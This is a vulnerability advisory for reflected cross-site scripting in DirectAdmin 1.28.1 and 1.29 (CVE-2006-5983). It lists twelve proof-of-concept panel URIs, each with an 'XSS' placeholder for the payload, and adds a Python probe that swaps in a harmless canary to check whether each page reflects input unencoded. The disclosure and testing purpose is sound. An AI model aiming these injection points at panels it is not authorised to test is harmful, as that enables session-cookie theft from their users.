DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
BID: 21049
CVE-2006-5983
Info
| Bugtraq ID: | 21049 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-5983 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 12 2006 12:00AM |
| Updated: | Apr 10 2007 12:02AM |
| Credit: | Aria-Security and DoZ are credited with the discovery of these vulnerabilities. |
| Vulnerable: | DirectAdmin DirectAdmin 1.28.1, DirectAdmin DirectAdmin 1.29 |
| Not Vulnerable: | |
Discussion
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input: values taken from query-string parameters (user, DOMAIN, name, type, file and others) on several CMD_ and HTM_ pages of the control panel are echoed back into the HTML response without encoding.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, that is, the DirectAdmin control panel (by default served on TCP port 2222). This may help the attacker steal cookie-based authentication credentials and launch other attacks with the victim's panel privileges.
Versions 1.28.1 and 1.29 are vulnerable; other versions may also be affected.
Exploit / POC
Attackers can exploit these issues via a web client. These are reflected (non-persistent) issues: the victim must be induced to open a crafted link, typically while holding a valid DirectAdmin session, so that the injected script runs with that session's privileges. In each URI below, the literal "XSS" (or "xss") marks the parameter whose value is reflected unencoded; replace it with the payload to be tested.
The following proof-of-concept URIs are available:
http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS
http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS
http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS
http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS
http://www.example.com:2222/CMD_FILE_MANAGER/xss
http://www.example.com:2222/CMD_FILE_MANAGER/images=xss
http://www.example.com:2222/HTM_EMAIL_POP_MODIFY?DOMAIN=demo.com&USER=xss
http://www.example.com:2222/CMD_ADMIN_FILE_EDITOR?file=XSS
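The check a practitioner wants after reading the list above is whether a given DirectAdmin build still reflects these parameters unencoded. The following script is an added example, not code from the advisory, from Aria-Security or from DirectAdmin. It substitutes a harmless canary containing markup for the "XSS" token in every proof-of-concept URI, fetches the page and reports whether the canary came back verbatim (injectable), HTML-encoded (fixed) or not at all. The base URL, canary string, sample responses and the safe_echo() helper are assumptions constructed for illustration.

```python
"""Reflected-XSS canary probe for the DirectAdmin PoC URIs in the advisory.

Added example; not part of the original advisory or of DirectAdmin.
Usage: python da_xss_probe.py http://panel.example.com:2222 [session-cookie]
"""
import html
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

# Canary carrying real markup, so that "echoed" and "echoed unencoded" are
# distinguishable. Assumed value; any unique string with tags would do.
CANARY = "x7q<b>zk9</b>"

# The proof-of-concept URIs from the advisory (duplicates dropped).
POC_URIS = [
    "http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS",
    "http://www.example.com:2222/CMD_SHOW_USER?user=XSS",
    "http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS",
    "http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS",
    "http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS",
    "http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS",
    "http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS",
    "http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS",
    "http://www.example.com:2222/CMD_FILE_MANAGER/xss",
    "http://www.example.com:2222/CMD_FILE_MANAGER/images=xss",
    "http://www.example.com:2222/HTM_EMAIL_POP_MODIFY?DOMAIN=demo.com&USER=xss",
    "http://www.example.com:2222/CMD_ADMIN_FILE_EDITOR?file=XSS",
]


def build_probe_urls(base, uris, canary=CANARY):
    """Re-host each PoC URI on `base`, swapping the XSS token (any case)
    for the URL-encoded canary so it survives the query string intact."""
    encoded = quote(canary, safe="")
    out = []
    for uri in uris:
        path = uri.split("/", 3)[3]  # drop scheme://host:port
        path = re.sub(r"xss", encoded, path, flags=re.IGNORECASE)
        out.append(base.rstrip("/") + "/" + path)
    return out


def classify_reflection(body, canary=CANARY):
    """'unescaped': markup came back verbatim, the page is injectable.
    'escaped':   the server HTML-encoded it, the reflection is safe.
    'absent':    the parameter is not echoed (or the request was refused)."""
    if canary in body:
        return "unescaped"
    if html.escape(canary) in body:
        return "escaped"
    return "absent"


def safe_echo(user):
    """What a fixed page should do with the parameter: encode before
    interpolating into HTML. Hypothetical fragment, not DirectAdmin's code."""
    return "<p>User %s not found</p>" % html.escape(user, quote=True)


def probe(url, cookie=None, timeout=10):
    """Fetch one probe URL and classify the reflection. Most panel pages
    require a session, so pass the browser's cookie header if you have one.
    Error pages are read too, since they often reflect input as well."""
    req = urllib.request.Request(url, headers={"User-Agent": "xss-canary-probe"})
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", "replace")
    return classify_reflection(body)


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://www.example.com:2222"
    cookie = sys.argv[2] if len(sys.argv) > 2 else None
    for probe_url in build_probe_urls(base, POC_URIS):
        print("%-10s %s" % (probe(probe_url, cookie), probe_url))
```

Run it only against a panel you are authorised to test. An "unescaped" result means the parameter is still injected verbatim into the page and the URI is exploitable with a real payload; "escaped" is the expected result on a patched build; "absent" usually means the page refused the request (no session) rather than that it is safe, so retry with a valid cookie before drawing a conclusion.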
Solution / Fix
Solution:
The vendor released fixes to address these issues. Please see the references for more information.
References
References:
- DirectAdmin Homepage (DirectAdmin)
- DirectAdmin Multiple Cross Site Scription (Aria Security)
- Feature Information (DirectAdmin)